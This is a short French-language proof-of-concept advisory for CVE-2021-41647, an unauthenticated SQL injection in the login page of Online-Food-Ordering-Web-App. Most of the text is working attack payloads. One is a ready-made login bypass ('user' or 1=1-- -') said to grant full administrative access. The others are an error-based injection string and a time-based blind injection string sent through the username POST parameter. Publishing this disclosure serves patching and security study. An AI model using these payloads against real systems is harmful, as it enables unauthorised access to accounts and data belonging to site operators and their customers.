
Exploit de preuve de concept pour l'injection SQL non authentifiée dans Online-Food-Ordering-Web-App, démontrant le contournement de connexion et les techniques d'injection aveugle basée sur le temps et les erreurs.
CVE-2021-41647 SQL Injection dans Online-Food-Ordering-Web-App
L'application Online-Food-Ordering-Web-App est vulnérable à des attaques par injection SQL non authentifiées de type error-based et time-based blind.
Le paramètre username sur la page /login.php ne nettoie pas l'entrée utilisateur, un attaquant peut contourner la connexion en utilisant une simple technique de contournement.
URL: /login.php
PARAMÈTRE: username
Pour contourner la connexion utilisateur et obtenir un accès administratif complet, utilisez la charge utile dans le champ username : user' or 1=1-- -
Paramètre: username (POST Request)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

Jason Colyvas
MOBIUSBINARY
20 septembre 2021